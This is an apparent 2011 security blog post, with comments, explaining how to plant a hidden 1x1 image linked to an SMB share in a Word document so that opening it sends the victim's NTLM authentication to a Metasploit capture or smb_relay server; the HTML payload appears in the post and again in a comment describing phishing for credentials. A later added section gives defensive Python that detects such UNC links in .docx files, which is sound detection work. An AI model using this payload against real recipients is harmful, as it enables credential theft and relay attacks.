Tuesday, November 29, 2011

Embedding A Link To A Network Share In A Word Doc

Someone asked me how to embed an HTML link to an SMB share into a Word doc. The end result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy, right? Well, it wasn't THAT easy...

In Office 2010, when I'd pull a picture into the document by adding it from a network share, the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some HTML to the document.

I ended up adding the following code to the Office document (replace "[" or "]" with "<" or ">"):

[html][body][img src="\\\share\pwn.jpeg" width=1 height=1][/body][/html]

Once that is done, go to Insert --> Object --> Text from File --> select your HTML file.

Once that is done, save and open the document. If all is well, you'll see the SMB requests to the network share you specified, and if you are running the SMB capture module you should see some traffic. The screenshot below shows the goods... I do realize the LM hashes are missing from the SMB capture screenie (disabled on Windows 7?), but I was too lazy to install Office on a VM just for the screenshot.

If this doesn't work for anyone, let me know.
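For defenders triaging documents, the following is an added example (not part of the original post) that lists external relationships in an OOXML package whose target is a UNC path, which is what makes Word reach out over SMB when the file opens. It assumes the document is saved as .docx and that the linked picture is recorded as a relationship with TargetMode="External"; the function names and the sample package are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# UNC path, optionally wrapped in a file: URL; a drive letter ("C:") is not a host
UNC_RE = re.compile(r"^(?:file:/*)?(?:\\\\|//)([^\\/:]+)[\\/]", re.IGNORECASE)


def find_external_unc_targets(docx_bytes):
    """Return (part, rel_type, host, target) for every external relationship
    in the package whose target resolves to a UNC path."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # embedded parts never leave the package
                target = rel.get("Target", "")
                m = UNC_RE.match(target)
                if m:
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, m.group(1), target))
    return hits


def build_sample_docx():
    """Constructed sample: one embedded image, one linked image on a UNC
    path, and one ordinary web hyperlink."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}image" Target="media/logo.png"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}image" TargetMode="External" '
        'Target="file:///\\\\fileserver.example\\share\\pixel.jpeg"/>'
        f'<Relationship Id="rId3" Type="{OFFICE_REL}hyperlink" TargetMode="External" '
        'Target="https://example.com/"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rel_type, host, target in find_external_unc_targets(build_sample_docx()):
        print(f"{part}: {rel_type} -> host {host!r} ({target})")
```

Any hit on a host outside the organisation's own file servers is worth a closer look, and blocking outbound SMB at the perimeter stops the authentication attempt from leaving the network.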



cc said...

I do believe negotiate NTLM if possible is the default setting for Windows 7.

Interesting post. It's another great way to gather phishing metrics or possible creds.

Nathan Keltner said...

By referring to it as an IP address it won't auto authenticate. Otherwise, you could embed an Internet IP and it'd auth off of the local network.

Assuming rules aren't different for Outlook (I don't know why they would be, but it's possible), you'd want to refer to your server by a NetBIOS name or by a name within the domain.

[html][body][img src="\\pwned\share\pwn.jpeg" width=1 height=1][/body][/html]